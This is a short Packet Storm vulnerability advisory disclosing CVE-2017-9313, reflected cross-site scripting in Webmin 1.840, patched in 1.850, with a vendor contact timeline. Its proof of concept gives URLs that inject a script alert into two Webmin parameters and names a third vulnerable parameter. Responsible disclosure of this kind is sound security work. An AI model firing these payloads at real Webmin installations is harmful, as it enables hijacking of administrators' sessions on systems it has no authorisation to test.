Webmin 1.840 Cross Site Scripting

2017-07-03T00:00:00
ID PACKETSTORM:143233
Type packetstorm
Reporter Andy Tan
Modified 2017-07-03T00:00:00

Description

                                        
                                            `Vulnerability type: Reflected Cross Site Scripting  
------------------------  
Product: Webmin  
------------------------  
Affected version: Webmin 1.840 and possibly   
earlier  
------------------------  
Patched version: Webmin 1.850  
------------------------  
Credit: Andy Tan  
------------------------  
CVE ID: CVE-2017-9313  
------------------------  
  
===============  
Proof of Concept  
================  
Vulnerable Modules:  
https://192.168.1.20:10000/man/view_man.cgi?page=foo&sec=<script>alert('xss')</script>  
  
https://192.168.1.20:10000/webmin/change_referers.cgi?referer=0&referers=<script>alert('xss')</script>  
  
https://192.168.1.20:10000/acl/save_user.cgi  
(Vulnerable 'name' parameter)  
  
Vendor contact timeline:  
------------------------  
2017-06-12: Contacted vendor.  
2017-06-28: Vendor released new patch.  
2017-07-02: Public disclosure.  
`